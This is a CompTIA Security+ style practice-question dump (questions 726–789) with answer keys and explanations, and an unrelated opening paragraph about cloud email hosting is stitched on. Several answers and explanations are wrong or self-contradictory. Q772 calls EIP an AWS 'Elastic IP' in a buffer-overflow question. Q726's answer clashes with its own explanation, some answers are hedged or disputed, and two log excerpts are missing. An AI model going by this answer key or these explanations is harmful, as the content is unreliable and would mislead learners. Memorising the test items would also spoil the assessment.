When you run a business, your “office hours” run around the clock. Keeping busy is often a good problem, but it can also cause you to have tunnel vision and fail to see how new ways of doing things can save you time and money.
Cloud email hosting is an excellent example of how businesses of all sizes can benefit from the latest technology. Although cloud-based email services have been available for several years, a 2018 CompTIA study revealed that 45% of small and medium-sized businesses are using cloud email hosting services, and 28% of them are using email in a SaaS (Software as a Service) application. This means that nearly 30% of companies aren’t taking advantage of what cloud email services can do for them.

END
QUESTION 726
An audit Identified Pll being utilized in the development environment of a critical application. The Chief Privacy Officer (CPO) Is adamant that this data must be removed; however, the developers are concerned that without real data they cannot perform functionality tests and search for specific data. Which of the following should a security professional implement to BEST satisfy both the CPO's and the development team's requirements?

A. Data anonymization 
B. Data encryption
C. Data masking
D. Data tokenization

Answer: A

Pseudo-anonymization replaces data with artificial identities, but the process can be reversed. Data anonymization modifies data to protect the privacy of individuals by either removing all Personally Identifiable Information or encrypting it.

Data masking can mean that all or part of the contents of a field are redacted, by substituting all character strings with "x" for example. A field might be partially redacted to preserve metadata for analysis purposes. For example, in a telephone
number, the dialing prefix might be retained, but the subscriber number redacted. Data masking can also use techniques to preserve the original format of the field. Data masking is an irreversible deidentification technique.

END
QUESTION 727
Which of the following is a policy that provides a greater depth of knowledge across an organization?

A. Asset management policy 
B. Separation of duties policy 
C. Acceptable use policy
D. Job rotation policy

Answer: D

END
QUESTION 728
An organization discovered a disgruntled employee exfiltrated a large amount of PII data by uploading files. 
Which of the following controls should the organization consider to mitigate this risk?

A. EDR
B. Firewall 
C. HIPS 
D. DLP

Answer: D

END
QUESTION 729
An attacker replaces a digitally signed document with another version that goes unnoticed. Upon reviewing the document's contents, the author notices some additional verbiage that was not originally in the document but can't validate an integrity issue. Which of the following attacks was used?

A. Cryptomalware 
B. Prepending
C. Collision 
D. Phishing

Answer: C

END
QUESTION 730
A network engineer created two subnets that will be used for production and development servers. 
Per security policy, production and development servers must each have a dedicated network that cannot communicate with one another directly. Which of the following should be deployed so that server administrators can access these devices?

A. VLANS
B. Internet proxy servers 
C. NIDS
D. Jump servers

Answer: D

Tricky question. 2nd sentence suggests segmentation through VLAN’s.
3rd sentence suggests selective and restrictive access through a jump server.

A jump server, jump host or jump box is a system on a network used to access and manage devices in a separate security zone. A jump server is a hardened and monitored device that spans two dissimilar security zones and provides a controlled means of access between them. The most common example is managing a host in a DMZ from trusted networks or computers.

END
QUESTION 731 
The Chief Information Security Officer (CISO) of a bank recently updated the incident response policy. The CISO is concerned that members of the incident response team do not understand their roles. The bank wants to test the policy but with the least amount of resources or impact. Which of the following BEST meets the requirements?

A. Warm site failover
B. Tabletop walk-through 
C. Parallel path testing 
D. Full outage simulation

Answer: B

END
QUESTION 732
A company has a flat network in the cloud. The company needs to implement a solution to segment its production and non-production servers without migrating servers to a new network. Which of the following solutions should the company implement?

A. internet
B. Screened Subnet 
C. VLAN segmentation 
D. Zero Trust

Answer: C

END
QUESTION 733
A security analyst is tasked with defining the "something you are" factor of the company's MFA settings. 
Which of the following is BEST to use to complete the configuration?

A. Gait analysis 
B. Vein
C. Soft token
D. HMAC-based, one-time password

Answer: B

Finger vein biometrics identifies a user based on the vein patterns in their fingers, which are unique to every person. 
It is also known as vascular biometrics, as the identifiable information is from the blood vessels beneath your skin.


END
QUESTION 734
A news article states hackers have been selling access to IoT camera feeds. 
Which of the following is the Most likely reason for this issue?

A. Outdated software 
B. Weak credentials 
C. Lack of encryption 
D. Backdoors

Answer: B

END
QUESTION 735
Which of the following prevents an employee from seeing a colleague who is visiting an inappropriate website?

A. Job rotation policy 
B. NDA
C. AUP
D. Separation of duties policy

Answer: C

END
QUESTION 736
Which of the following techniques eliminates the use of rainbow tables for password cracking?

A. Hashing
B. Tokenization
C. Asymmetric encryption 
D. Salting

Answer: D

Salting passwords is a common method of preventing rainbow table attacks, along with other password attacks such as dictionary attacks. A salt is a set of random data such as two additional characters. Password salting adds these additional characters to a password before hashing it. These additional characters add complexity to the password, and also result in a different hash than the system would create using only the original password. This causes password attacks that compare hashes to fail.

END
QUESTION 737
A security analyst is receiving several alerts per user and is trying to determine if various logins are malicious. 
The security analyst would like to create a baseline of normal operations and reduce noise. 
Which of the following actions should the security analyst perform?

A. Adjust the data flow from authentication sources to the SIEM. 
B. Disable email alerting and review the SIEM directly.
C. Adjust the sensitivity levels of the SIEM correlation engine.
D. Utilize behavioral analysis to enable the SIEM's learning mode.

Answer: D

END
QUESTION 738
Which of the following typically uses a combination of human and artificial intelligence to analyze event data and take action without intervention?

A. TTP 
B. OSINT 
C. SOAR 
D. SIEM

Answer: C

END
QUESTION 739
While preparing a software Inventory report, a security analyst discovers an unauthorized program installed on most of the company's servers. The program utilizes the same code signing certificate as an application deployed to only the accounting team. Which of the following mitigations would BEST secure the server environment?

A. Revoke the code signing certificate used by both programs. 
B. Block all unapproved file hashes from installation.
C. Add the accounting application file hash to the allowed list.
D. Update the code signing certificate for the approved application.

Answer: A

END
QUESTION 740
A security analyst in a SOC has been tasked with onboarding a new network into the SIEM. Which of the following BEST describes the information that should feed into an SIEM solution to adequately support an investigation?

A. Logs from each device type and security layer to provide correlation of events.
B. Only firewall logs since that is where attackers will most likely try to breach the network.
C. Email and web-browsing logs because user behavior is often the cause of security breaches.
D. NetFlow because it is much more reliable to analyze than syslog and will be exportable from
every device

Answer: A

END
QUESTION 741
Two hospitals merged into a single organization. The privacy officer requested a review of all records to ensure encryption was used during record storage, in compliance with regulations. During the review, the officer discovered that medical diagnosis codes and patient names were left unsecured. Which of the following types of data does this combination BEST represent?

A. Personal health information
B. Personally Identifiable Information 
C. Tokenized data
D. Proprietary data

Answer: A

Protected health information PHI is a subset of PII, but it specifically refers to health information shared with HIPAA covered entities. Medical records, lab reports, and hospital bills are PHI, along with any information relating to an individual’s past, present, or future physical or mental health.

END
QUESTION 742
Which of the following is the MOST effective way to detect security flaws present on third-party libraries embedded on software before it is released into production?

A. Employ different techniques for server- and client-side validations. 
B. Use a different version control system for third-party libraries.
C. Implement a vulnerability scan to assess dependencies earlier on SDLC.
D. Increase the number of penetration tests before software release.

Answer: C

Implementing vulnerability scans allows for earlier detection and assessment of any potential vulnerabilities, which can then be addressed accordingly.

END
QUESTION 743
A Chief Security Officer is looking for a solution that can reduce the occurrence of customers receiving errors from back-end infrastructure when systems go offline unexpectedly. The security architect would like the solution to help maintain session persistence. Which of the following would BEST meet the requirements?

A. Reverse proxy 
B. NIC teaming 
C. Load balancer 
D. Forward proxy

Answer: C

A reverse proxy server provides for protocol-specific inbound traffic. For security purposes, you might not want external 
hosts to be able to connect directly to application servers, such as web, email, and VoIP servers. Instead, you can deploy a reverse proxy on the network edge and configure it to listen for client requests from a public network (the Internet). The proxy applies filtering rules and if accepted, it creates the appropriate request for an application server within a DMZ. In addition, 
some reverse proxy servers can handle application-specific load balancing, traffic encryption, and caching, reducing the 
overhead of the application servers.

END
QUESTION 744
Which of the following is a reason to publish files' hashes?

A. To validate the integrity of the files
B. To verify if the software was digitally signed 
C. To use the hash as a software activation key 
D. To use the hash as a decryption passphrase

Answer: A

END
QUESTION 745
A company is moving its retail website to a public cloud provider. 
The company wants to tokenize credit card data but not allow the cloud provider to see the stored credit card information. Which of the following would BEST meet these objectives?

A. WAF 
B. CASB 
C. VPN 
D. TLS

Answer: B


END
QUESTION 746
A technician was dispatched to complete repairs on a server in a data center. 
While locating the server, the technician entered a restricted area without authorization. 
Which of the following security controls would BEST prevent this in the future?

A. Use appropriate signage to mark all areas. 
B. Utilize cameras monitored by guards.
C. Implement access control vestibules. 
D. Enforce escorts to monitor all visitors.

Answer: D

Reasoning for Answer D - It is not realistic a visitor would have a smart card to enter the access control vestibule.
The question suggests entering the restricted area with appropriate authorization.
Not preventing access altogether.

Reasoning for Answer C - An access control vestibule, or mantrap, is a physical access control system designed to prevent unauthorized individuals from following authorized individuals into facilities with controlled access. This question is asking for a way to prevent physical access to restricted area and this method would address this.

END
QUESTION 747
A user wanted to catch up on some work over the weekend but had issues logging in to the corporate network using a VPN. On Monday, the user opened a ticket for this issue, but was able to log in successfully. 
Which of the following BEST describes the policy that is being implemented?

A. Time-based logins 
B. Geofencing
C. Network location 
D. Password history

Answer: A

Time-based logins: Time-of-day restrictions is an access control concept that limits when a user account is able to log into a system or network. This is a tool and technique for limiting access to sensitive environments to normal business hours, when oversight and monitoring can be performed to prevent fraud, abuse, or intrusion. Time-of-day restrictions may also force logout on an account after the authorized time period ends.

END
QUESTION 748
Several attempts have been made to pick the door lock of a secure facility. 
As a result, the security engineer has been assigned to implement a stronger preventative access control. 
Which of the following would BEST complete the engineer's assignment?

A. Replacing the traditional key with an RFID key
B. Installing and monitoring a camera facing the door
C. Setting motion-sensing lights to illuminate the door on activity 
D. Surrounding the property with fencing and gates

Answer: A

Replacing the traditional key with an RFID key - For this question, there is mention of "attempts have been made to pick the door lock". Out of the options provided, only the option to replace the current door key with an RFID key directly addresses this issue. The other options can be viewed as preventative access control systems/ deterrents as well.

Preventative access control - An access control that is used to stop unwanted or unauthorized activity from occurring, these could be policies, firewalls, physical barriers etc.

RFID (Radio Frequency Identification) - A type of key card/fob access control system that uses a radio frequency signals to communicate between a reader and an RFID tag. You would place the tag/card near the reader and if the reader identifies the signal as belonging to an authorized user, they will be allowed access.

END
QUESTION 749
A security analyst is evaluating the risks of authorizing multiple security solutions to collect data from the company's cloud environment. Which of the following is an immediate consequence of these integrations?

A. Non-compliance with data sovereignty rules 
B. Loss of the vendor's interoperability support 
C. Mandatory deployment of a SIEM solution 
D. Increase in the attack surface

Answer: C

END
QUESTION 750
Security analysts notice a server login from a user who has been on vacation for two weeks 
The analysts confirm that the user did not log in to the system while on vacation.
After reviewing packet capture logs, the analysts notice the following:



Which of the following occurred?

A. A buffer overflow was exploited to gain unauthorized access
B. The user's account was compromised, and an attacker changed the login credentials 
C. An attacker used a pass-the-hash attack to gain access
D. An insider threat with username smithJA logged in to the account

Answer: C

Pass The Hash - If the threat actor can obtain the hash of a user password, it is possible to present the hash 
(without cracking it) to authenticate to network protocols such as the Windows File Sharing protocol Server
Message Block (SMB), and other protocols that accept NTLM hashes as authentication credentials.

END
QUESTION 751
A company's security team received notice of a critical vulnerability affecting a high-profile device within the web infrastructure. The vendor patch was just made available online but has not yet been regression tested in development environments. In the interim, firewall rules were implemented to reduce the access to the interface affected by the vulnerability. Which of the following controls does this scenario describe?

A. Deterrent
B. Compensating 
C. Detective
D. Preventive

Answer: B

END
QUESTION 752
Which of the following is used to ensure that evidence is admissible in legal proceedings when it is collected and provided to the authorities?

A. Chain of custody 
B. Legal hold
C. Event log 
D. Artifacts

Answer: A

A chain of custody is a chronological paper trail documenting when, how, and by whom individual items of physical or electronic evidence - such as cell phone logs - were collected, handled, analyzed, or otherwise controlled during an investigation.

END
QUESTION 753
An analyst receives multiple alerts for beaconing activity for a host on the network. 
After analyzing the activity, the analyst observes the following activity:

- A user enters comptia.org into a web browser.
- The website that appears is not the comptia.org site. 
- The website is a malicious site from the attacker.
- Users in a different office are not having this issue.

Which of the following types of attacks was observed?

A. On-path attack 
B. DNS poisoning
C. Locator (URL) redirection 
D. Domain hijacking

Answer: B

The assumption here is that different offices use different DNS Servers.

END
QUESTION 754
A security analyst is tasked with classifying data to be stored on company servers. 
Which of the following should be classified as proprietary?

A. Customers' dates of birth
B. Customers' email addresses 
C. Marketing strategies
D. Employee salaries

Answer: C

Proprietary Information” shall mean information (whether now existing or hereafter created or acquired) developed, created, or discovered by the Company, or which became known by, or was conveyed to the Company, which has commercial value in the Company's business.

END
QUESTION 755
A security engineer is concerned about using an agent on devices that relies completely on defined known-bad signatures. The security engineer wants to implement a tool with multiple components including the ability to track, analyze, and monitor devices without reliance on definitions alone. Which of the following solutions BEST fits this use case?

A. EDR 
B. DLP 
C. NGFW 
D. HIPS

Answer: A 

Explanation:
The acronym EDR stands for Endpoint Detection and Response and is also known as EDTR. It is an endpoint security solution that is responsible for continuous monitoring of endpoints. This permanent monitoring enables the technology to detect and respond to cyber threats such as malware or ransomware at an early stage. The basis for this is always the analysis of context-related information, which can be used to make corrective proposals for recovery.

END
QUESTION 756
A security architect is required to deploy to conference rooms some workstations that will allow sensitive data to be displayed on large screens. Due to the nature of the data, it cannot be stored in the conference rooms. 
The file share is located in a local data center. 
Which of the following should the security architect recommend to BEST meet the requirement?

A. Fog computing and KVMs 
B. VDI and thin clients
C. Private cloud and DLP
D. Full drive encryption and thick clients

Answer: B

Virtual Desktop Infrastructure (VDI) is a technology that refers to the use of virtual machines to provide and manage virtual desktops. VDI hosts desktop environments on a centralized server and deploys them to end-users on request. VDI can be used to provide the desktop experience. The computing hardware for VDI can be split into thin clients and thick clients:

- Thin clients are simple computers that can be accessed through a remote connection to a central server which provides the client all of its resources. Thin clients do not have hard drives (or the hard drives don’t contain the resources being used) so data isn't stored locally, and applications would also need to be accessed through a server. Thin clients would work for this scenario since data can't be stored in the conference rooms and thin clients can’t store data anyway

END
QUESTION 757
Which of the following should an organization consider implementing in the event executives need to speak to the media after a publicized data breach?

A. Incident response plan 
B. Business continuity plan 
C. Communication plan
D. Disaster recovery plan

Answer: C

A communication plan is part of an incident response plan, and it provides direction on how to communicate issues related to an incident. As with all elements of an incident response plan, it’s important to create the communication plan before an incident. If a plan isn’t in place, the wrong people may talk to the media and give the impression that the incident is causing chaos within the organization.

END
QUESTION 758
An analyst is reviewing logs associated with an attack. The logs indicate an attacker downloaded a malicious file that was quarantined by the AV solution. The attacker utilized a local non-administrative account to restore the malicious file to a new location. The file was then used by another process to execute a payload. Which of the following attacks did the analyst observe?

A. Privilege escalation 
B. Request forgeries 
C. Injection
D. Replay attack

Answer: C 

An injection attack is any exploitation that allows an attacker to submit code to a target system to modify its operations and/or poison and corrupt its data set. This is also called remote code attacks or remote code exploits.

END
QUESTION 759
The president of a regional bank likes to frequently provide SOC tours to potential investors. 
Which of the following policies BEST reduces the risk of malicious activity occurring after a tour?

A. Password complexity 
B. Acceptable use
C. Access control 
D. Clean desk

Answer: D

END
QUESTION 760
Which of the following can be used by a monitoring tool to compare values and detect password leaks without providing the actual credentials?

A. Hashing
B. Tokenization 
C. Masking
D. Encryption

Answer: A 

END
QUESTION 761
An annual information security assessment has revealed that several OS-level configurations are not in compliance due to outdated hardening standards the company is using. Which of the following would be BEST to use to update and reconfigure the OS-level security configurations?

A. CIS benchmarks 
B. GDPR guidance
C. Regional regulations 
D. ISO 27001 standards

Answer: A 

CIS Benchmarking -> CIS Benchmarks from the Center of Internet Security (CIS) are a set of globally recognized and consensus-driven best practices to help security practitioners implement and manage their cybersecurity defenses.

https://www.beyondtrust.com/resources/glossary/systems-hardening

10 Best Practices for Systems Hardening

The type of hardening you carry out depends on the risks in your existing technology, the resources you have available, and the priority for making fixes.

Audit your existing systems: Carry out a comprehensive audit of your existing technology (you can use). Use penetration testing, vulnerability scanning, configuration management, and other security auditing tools to find flaws in the system and prioritize fixes. Conduct system hardening assessments against resources using industry standards from NIST, Microsoft, CIS, DISA, etc.

END
QUESTION 762
A company wants to simplify the certificate management process. 
The company has a single domain with several dozen subdomains, all of which are publicly accessible on the internet. Which of the following BEST describes the type of certificate the company should implement?

A. Subject alternative name 
B. Wildcard
C. Self-signed
D. Domain validation

Answer: B

Wildcard SSL certificates are for a single domain and all its subdomains. A subdomain is under the umbrella of the main domain. Usually subdomains will have an address that begins with something other than 'www.'
For example, www.cloudflare.com has a number of subdomains, including blog.cloudflare.com, support.cloudflare.com, and developers.cloudflare.com. Each is a subdomain under the main cloudflare.com domain.
A single Wildcard SSL certificate can apply to all of these subdomains. Any subdomain will be listed in the SSL certificate. Users can see a list of subdomains covered by a particular certificate by clicking on the padlock in the URL bar of their browser, then clicking on "Certificate" (in Chrome) to view the certificate's details.
https://www.cloudflare.com/learning/ssl/types-of-ssl-certificates/

END
QUESTION 763
Which of the following BEST describes when an organization utilizes a ready-to-use application from a cloud provider?

A. laaS 
B. SaaS 
C. Paas 
D. XaaS

Answer: B 

SaaS, or software as a service, is on-demand access to ready-to-use, cloud-hosted application software.
https://www.ibm.com/cloud/learn/iaas-paas-saas

END
QUESTION 764
A security analyst is reviewing web-application logs and finds the following log:


Which of the following attacks is being observed?

A. Directory traversal 
B. XSS
C. CSRF
D. On-path attack

Answer: A

END
QUESTION 765
Which of the following describes a social engineering technique that seeks to exploit a person's sense of urgency?

A. A phishing email stating a cash settlement has been awarded but will expire soon.
B. A smishing message stating a package is scheduled for pickup.
C. A vishing call that requests a donation be made to a local charity.
D. A SPIM notification claiming to be undercover law enforcement investigating a cybercrime.

Answer: A 

As one of the most popular social engineering attack types, phishing scams are email and text message campaigns aimed at creating a sense of urgency, curiosity or fear in victims. It then prods them into revealing sensitive information, clicking on links to malicious websites, or opening attachments that contain malware.
https://www.imperva.com/learn/application-security/social-engineering-attack/#:~:text=Phishing,curiosity%20or%20fear%20in%20victims.

END
QUESTION 766
An organization just implemented a new security system. Local laws state that citizens must be notified prior to encountering the detection mechanism to deter malicious activities. Which of the following is being implemented?

A. Proximity cards with guards 
B. Fence with electricity
C. Drones with alarms
D. Motion sensors with signage

Answer: D

END
QUESTION 767
Which of the following is a targeted attack aimed at compromising users within a specific industry or group?

A. Watering hole 
B. Typosquatting 
C. Hoax
D. Impersonation

Answer: A 

A watering hole attack is a targeted attack designed to compromise users within a specific industry or group of users by infecting websites they typically visit and luring them to a malicious site.

END
QUESTION 768
Which of the following documents provides guidance regarding the recommended deployment of network security systems from the manufacturer?

A. Cloud control matrix
B. Reference architecture 
C. NIST RMF (Risk Management Framework)
D. CIS Top 20

Answer: B

In cybersecurity, reference architecture is a document or set of documents that provides a set of standards. As an example, a software reference architecture documents high-level design decisions. It may stress the need to create reusable modules and follow a specific standard related to interfaces. Some software reference architecture documents list procedures, functions, and methods that a software project should use. You won’t find a single reference architecture that meets the needs of all projects. Instead, the key is that complex projects often use one to standardize everyone’s efforts on a project.

Enterprise reference architecture (ea.cloudsecurityalliance.org)—best practice methodology and tools for CSPs to use in architecting cloud solutions. The solutions are divided across a number of domains, such as risk management and
infrastructure, application, and presentation services.

 

https://www.cybersaint.io/blog/cis-controls-list
The Center for Internet Security (CIS) is a non-profit organization responsible for developing best practices for internet security. The frameworks set forth by CIS affect everybody from people to organizations and governments and was done in an effort to create safe, reliable standards of protection for IT systems and cybersecurity programs from data breaches. The CIS Controls, formerly the CIS Top 20, make a strong foundation for a newly maturing cybersecurity program. 

The Cloud Controls Matrix (CCM) is a baseline set of security controls created by the Cloud Security Alliance to help enterprises assess the risk associated with a cloud computing provider.

END
QUESTION 769
Users are presented with a banner upon each login to a workstation. 
The banner mentions that users are not entitled to any reasonable expectation of privacy and access is for authorized personnel only. In order to proceed past that banner, users must click the OK button. 
Which of the following is this an example of?

A. AUP 
B. NDA 
C. SLA
D. MOU

Answer: A

An acceptable use policy (AUP) is a document that outlines the rules and restrictions employees must follow in regard to the company's network, software, internet connection and devices.

END
QUESTION 770
Which of the following is the BEST action to foster a consistent and auditable incident response process?

A. Encourage new hires to constantly update the document with external knowledge.
B. Publish the document in a central repository that is easily accessible to the organization. 
C. Restrict eligibility to comment on the process to subject matter experts of each IT silo. 
D. Rotate CIRT members to foster a shared responsibility model in the organization.

Answer: C

END
QUESTION 771
A user reports falling for a phishing email to an analyst. 
Which of the following system logs would the analyst check FIRST?

A. DNS
B. Message gateway 
C. Network
D. Authentication

Answer: A (B Possible)

END
QUESTION 772
A penetration tester is fuzzing an application to identify where the EIP (Elastic IP) of the stack is located on memory. 
Which of the following attacks is the penetration tester planning to execute?

A. Race-condition 
B. Pass-the-hash 
C. Buffer overflow 
D. XSS

Answer: C

Buffer Overflow - A buffer is an area of memory that the application reserves to store expected data. To exploit a buffer overflow vulnerability, the attacker passes data that deliberately overfills the buffer. One of the most common vulnerabilities 
is a stack overflow. The stack is an area of memory used by a program subroutine. It includes a return address, which is the
location of the program that called the subroutine. An attacker could use a buffer overflow to change the return address, 
allowing the attacker to run arbitrary code on the system.

Elastic IP address is a public static IPv4 address which is reachable from the Internet. Basically, Elastic IP addresses are used by AWS to manage its dynamic cloud computing services. Within the AWS infrastructure, customers have virtual private clouds (VPC), within the VPCs, users have instances. So when you launch an EC2 instance, you receive a Public IP address by which that instance is reachable from internet. Once you stop that instance and restart the instance you get a new Public IP for the same instance. So it's basically a problem to connect your instance from internet for not having a static IP. To overcome this problem, we attach an Elastic IP to an Instance which doesn't change after you stop / start the instance.

An Amazon EC2 instance is a virtual server in Amazon's Elastic Compute Cloud (EC2) for running applications on the Amazon Web Services (AWS) infrastructure.

END
QUESTION 773
Which of the following in the incident response process is the BEST approach to improve the speed of the identification phase?

A. Activate verbose logging in all critical assets.
B. Tune monitoring in order to reduce false positive rates. 
C. Redirect all events to multiple syslog servers.
D. Increase the number of sensors present on the environment.

Answer: A

Reasoning for Answer A – More detailed information from log files could reduce a guessed assumption of what may have occurred.

Reasoning for Answer B - In the incident response process the identification phase is used to recognize whether an event that occurs should be classified as an incident. Therefore false positive tuning would increase the identification time.

END
QUESTION 774
An attacker has determined the best way to impact operations is to infiltrate third-party software vendors. 
Which of the following vectors is being exploited?

A. Social media 
B. Cloud
C. Supply chain
D. Social engineering

Answer: C
Supply chain attacks are an emerging kind of threat that target software developers and suppliers. The goal is to access source codes, build processes, or update mechanisms by infecting legitimate apps to distribute malware.

END
QUESTION 775
Which of the following concepts BEST describes tracking and documenting changes to software and managing access to files and systems?

A. Version control
B. Continuous monitoring 
C. Stored procedures
D. Automation

Answer: A

Version control, also known as source control, is the process of tracking and managing changes to files over time. VCS -- version control systems -- are software tools designed to help teams work in parallel.
https://www.perforce.com/blog/vcs/what-is-version-control

END
QUESTION 776
Which of the following controls is used to make an organization initially aware of a data compromise?

A. Protective 
B. Preventative 
C. Corrective 
D. Detective

Answer: D

Detective control identifies security events that have already occurred. Intrusion detection systems are detective controls.

Preventative Controls - acts to eliminate or reduce the likelihood that an attack can succeed. A preventative control operates before an attack can take place. They are comparing the configurations to a secure guideline to ensure no gaps. Meaning they are pre-emptively hardening their systems against future attack vectors.

Corrective Controls - controls that remediate security issues that have already occurred. Restoring backups after a ransomware attack is an example of a corrective control.

END
QUESTION 777
A vulnerability has been discovered and a known patch to address the vulnerability does not exist. 
Which of the following controls works BEST until a proper fix is released?

A. Detective
B. Compensating 
C. Deterrent
D. Corrective

Answer: B

Deterrent controls discourage would-be attackers or malicious insiders. Door locks, lighting, CCTV cameras, suspensions, and fines, are all deterrent controls. For example, knowing that you are being closely monitored by a camera should deter you from stealing a laptop. Additionally, if you see that the laptop is secured to the table with a hardware lock, you probably wouldn’t even attempt to steal the laptop in the first place. Suspensions and fines can be used as warnings to employees who do not wish to follow the data agreements of their organization.

Compensating controls are alternative controls used instead of a primary control. As an example, an organization might require employees to use smart cards when authenticating on a system. However, it might take time for new employees to receive their smart card. To allow new employees to access the network and still maintain a high level of security, the organization might choose to implement a Time-based One-Time Password (TOTP) as a compensating control. The compensating control still provides a strong authentication solution.

END
QUESTION 778
A company wants to build a new website to sell products online. The website will host a storefront application that will allow visitors to add products to a shopping cart and pay for the products using a credit card. 
Which of the following protocols would be the MOST secure to implement?

A. SSL 
B. FTP 
C. SNMP 
D. TLS

Answer: D

The POODLE attack (Padding Oracle on Downgraded Legacy Encryption) exploits a vulnerability in the SSL 3.0 protocol (CVE-2014-3566). This vulnerability lets an attacker eavesdrop on communication encrypted using SSLv3. The vulnerability is no longer present in the Transport Layer Security protocol (TLS), which is the successor to SSL (Secure Socket Layer).

Transport Layer Security (TLS) is the successor protocol to SSL. TLS is an improved version of SSL. It works in much the same way as the SSL, using encryption to protect the transfer of data and information. The two terms are often used interchangeably in the industry although SSL is still widely used.

END
QUESTION 779
Which of the following is the FIRST environment in which proper, secure coding should be practiced?

A. Stage
B. Development 
C. Production 
D. Test

Answer: B

The developer has to start writing secure code from the beginning which will then be tested, staged and finally production.

END
QUESTION 780
The new Chief Information Security Officer at a company has asked the security team to
implement stronger user account policies. The new policies require:

- Users to choose a password unique to their last ten passwords 
- Users to not log in from certain high-risk countries

Which of the following should the security team implement? (Select TWO).

A. Password complexity 
B. Password history
C. Geolocation 
D. Geofencing 
E. Geotagging
F. Password reuse

Answer: BD

Geolocation. Mobile devices commonly include GPS capabilities that are used for geolocation. Applications commonly use 
GPS to identify the location of the device and device movement. GPS can also be used to locate a lost device. 

Geofencing. Organizations sometimes use GPS to create a virtual fence or geographic boundary using geofencing technologies. Apps can respond when the device is within the virtual fence. As an example, an organization can configure mobile apps so that they will only run when the device is within the virtual fence. Similarly, an organization can configure a wireless network to only operate for mobile devices within the defined boundary.

Geolocation is the technology used to perform Geofencing. And to actually restrict logins from certain locations you would use geofencing.

END
QUESTION 781
A cyber security administrator is using an enterprise firewall. 
The administrator created some rules, but now seems to be unresponsive. 
All connections are being dropped by the firewall. 
Which of the following would be the BEST option to remove the rules?

A. # iptables t mangle -x 
B. # iptables -f
C. # iptables -z
D. # iptables -p input j drop

Answer: B

Command options instruct iptables to perform a specific action. Only one command option is allowed per iptables command. With the exception of the help command, all commands are written in upper-case characters.
The iptables commands are as follows:
>  -A — Appends the iptables rule to the end of the specified chain. This is the command used to add a rule when rule order in the chain does not matter.
>  -C — Checks a particular rule before adding it to the user-specified chain. This command can help you construct complicated iptables rules by prompting you for additional parameters and options.
>  -D — Deletes a rule in a particular chain by number (such as 5 for the fifth rule in a chain). You can also type the entire rule, and iptables deletes the rule in the chain that matches it.
>  -E — Renames a user-defined chain. This does not affect the structure of the table.
>  -F — Flushes the selected chain, which effectively deletes every rule in the chain. If no chain is specified, this command flushes every rule from every chain.
>  -h — Provides a list of command structures, as well as a quick summary of command parameters and options.
>  -I — Inserts a rule in a chain at a point specified by a user-defined integer value. If no number is specified, iptables places the command at the top of the chain.

END
QUESTION 782
An untrusted SSL certificate was discovered during the most recent vulnerability scan. A security analyst determines the certificate is signed properly and is a valid wildcard. This same certificate is installed on other company servers without issue. Which of the following is the MOST likely reason for this finding?

A. The required intermediate certificate is not loaded as part of the certificate chain. 
B. The certificate is on the CRL and is no longer valid.
C. The corporate CA has expired on every server, causing the certificate to fail verification.
D. The scanner is incorrectly configured to not trust this certificate when detected on the server.

Answer: D

Most of the time the scanning engine will require a root CA certificate (if needed) to get more accurate results from the scan. If a root CA certificate is not provided and a SSL certificate is located on a server, the result will be that is "untrusted" so we have to load the root one and the warning will disappear.

END
QUESTION 783
Which of the following supplies nonrepudiation during a forensics investigation?

A. Dumping volatile memory contents first 
B. Duplicating a drive with dd
C. Using a SHA2 signature of a drive image 
D. Logging everyone in contact with evidence 
E. Encrypting sensitive data

Answer: C (Non-Repudiation is usually associated with Integrity, Authentication & Digital Certificates)

END
QUESTION 784
Which of the following uses SAML for authentication?

A. TOTP
B. Federation 
C. Kerberos 
D. HOTP

Answer: B

A federated network or cloud needs specific protocols and technologies to implement user identity assertions and transmit attestations between the principal, the relying party, and the identity provider. Security Assertions Markup Language (SAML) 
Is one such solution. SAML attestations (or authorizations) are written in eXtensible Markup Language (XML). Communications are established using HTTP/HTTPS and the Simple Object Access Protocol (SOAP).

END
QUESTION 785
Which of the following processes will eliminate data using a method that will allow the storage device to be reused after the process is complete?

A. Pulverizing 
B. Overwriting 
C. Shredding 
D. Degaussing

Answer: B

degaussing - rendering a storage drive inoperable and data unrecoverable by eliminating the drive's magnetic charge.

END
QUESTION 786
A company discovered that terabytes of data have been exfiltrated over the past year after an employee clicked on an email link. The threat continued to evolve and remain undetected until a security analyst noticed an abnormal amount of external connections when the employee was not working. Which of the following is the MOST likely threat actor?

A. Shadow IT 
B. Script kiddies 
C. APT
D. Insider threat

Answer: C

The term Advanced Persistent Threat (APT) was coined to understand the behavior underpinning modern types of
cyber adversaries. Rather than think in terms of systems being infected with a virus or Trojan, an APT refers to the ongoing 
ability of an adversary to compromise network security—to obtain and maintain access—using a variety of tools and techniques.

END
QUESTION 787
A major political party experienced a server breach. The hacker then publicly posted stolen internal communications concerning campaign strategies to give the opposition party an advantage. 
Which of the following BEST describes these threat actors?

A. Semi authorized hackers 
B. State actors
C. Script kiddies
D. Advanced persistent threats

Answer: B

The goals of state actors are primarily espionage and strategic advantage.

END
QUESTION 788
Scalability and flexibility for back-end infrastructure, allowing it to be updated and modified without disruption to services. The security architect would like the solution selected to reduce the back-end server resources and has highlighted that session persistence is not important for the applications running on the back-end servers. Which of the following would BEST meet the requirements?

A. Reverse proxy
B. Automated patch management 
C. Snapshots
D. NIC teaming

Answer: A 

A reverse proxy would be the best solution for increased scalability and flexibility for back-end infrastructure.

https://www.nginx.com/resources/glossary/reverse-proxy-vs-load-balancer/
Reverse Proxy
Whereas deploying a load balancer makes sense only when you have multiple servers, it often makes sense to deploy a reverse proxy even with just one web server or application server. You can think of the reverse proxy as a website’s “public face.” Its address is the one advertised for the website, and it sits at the edge of the site’s network to accept requests from web browsers and mobile apps for the content hosted at the website. The benefits are two-fold:
>  Increased security – No information about your backend servers is visible outside your internal network, so malicious clients cannot access them directly to exploit any vulnerabilities. Many reverse proxy servers include features that help protect backend servers from distributed denial-of-service (DDoS) attacks, for example by rejecting traffic from particular client IP addresses (blacklisting), or limiting the number of connections accepted from each client.
>  Increased scalability and flexibility – Because clients see only the reverse proxy’s IP address, you are free to change the configuration of your backend infrastructure. This is particularly useful in a load-balanced environment, where you can scale the number of servers up and down to match fluctuations in traffic volume.

END
QUESTION 789
A recent phishing campaign resulted in several compromised user accounts. The security incident response team has been tasked with reducing the manual labor of filtering through all the phishing emails as they arrive and blocking the sender's email address, along with other time-consuming mitigation actions. Which of the following can be configured to streamline those tasks?

A. SOAR playbook 
B. MOM policy
C. Firewall rules 
D. URL filter
E. SIEM data collection

Answer: A

